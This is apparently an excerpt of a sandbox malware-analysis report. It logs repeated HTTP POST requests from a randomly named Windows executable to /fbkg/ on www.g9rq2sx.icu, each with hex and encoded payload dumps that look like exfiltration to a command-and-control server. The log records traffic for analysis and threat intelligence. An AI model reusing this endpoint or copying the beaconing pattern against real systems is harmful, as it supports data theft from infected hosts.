                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=
                                                                                                                                                                                                Nov 17, 2023 19:32:26.330941916 CET1439OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7338.163.97.880192.168.11.2050200C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:23.330815077 CET1425OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=
                                                                                                                                                                                                Nov 17, 2023 19:32:26.330941916 CET1439OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                74192.168.11.205020138.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:26.227411032 CET1438OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65 6a 38 6f 41 43 5a 6b 56 6a 67 5a 41 79 4a 69 49 62 46 5a 6c 58 4c 58 4f 30 66 53 77 48 50 36 38 4a 58 43 43 56 44 52 66 62 67 62 75 6b 6a 57 67 41 65 39 62 4c 61 4b 54 59 43 63 53 43 45 70 79 37 79 30 52 2f 30 32 54 37 34 61 63 42 79 71 39 6d 79 78 76 33 59 4d 74 4c 48 37 65 44 72 35 4a 45 51 4c 50 31 39 36 63 31 55 4f 50 52 57 58 70 71 38 66 4d 57 61 58 38 4f 6a 33 51 33 6a 4c 73 5a 39 77 2f 66 6b 55 69 35 69 37 74 41 79 43 79 31 74 6d 53 51 6c 56 6d 67 33 35 70 77 55 5a 4d 33 6f 32 6f 31 6e 77 39 67 36 57 66 4c 7a 49 77 37 45 47 56 39 66 45 4d 67 52 65 51 61 30 36 78 55 30 4f 54 37 48 54 6c 33 6c 4d 78 68 53 41 53 64 78 77 39 58 72 55 6e 74 52 73 48 34 64 57 73 46 7a 57 33 69 76 4c 47 30 71 6a 38 67 79 71 48 73 41 30 48 6e 70 6e 4c 77 66 5a 34 65 76 38 4f 65 74 43 63 4e 47 6d 33 6a 45 37 36 59 55 46 50 43 6d 4b 66 2b 34 34 51 78 41 52 6e 6b 68 6a 59 41 46 48 39 6b 2f 31 63 61 39 43 61 79 67 55 4e 79 64 71 38 45 54 6b 37 47 55 79 57 47 4b 71 51 6b 61 68 4a 66 43 35 50 4b 4e 42 52 74 32 69 49 7a 52 4b 6b 76 5a 41 78 68 4c 6f 50 52 47 76 47 61 4b 74 6b 37 45 6c 6b 43 73 36 71 7a 4b 30 45 53 71 41 75 6a 5a 41 68 75 57 47 6d 64 42 6d 75 79 59 52 42 62 70 6d 79 38 5a 65 65 71 2b 65 58 56 72 59 37 66 32 62 2f 41 50 77 77 62 68 6a 72 59 71 75 34 33 4b 6f 67 70 49 55 44 35 42 65 61 4b 74 37 52 42 44 2b 66 58 75 62 4e 76 46 46 42 33 6b 65 39 53 72 59 38 37 48 46 75 69 75 42 78 46 6e 56 47 4a 36 44 57 37 6d 32 67 4b 76 58 50 54 4b 46 65 44 65 43 65 6d 63 4e 6c 54 38 74 56 66 30 58 53 72 6e 2f 70 57
                                                                                                                                                                                                Data Ascii: T6I=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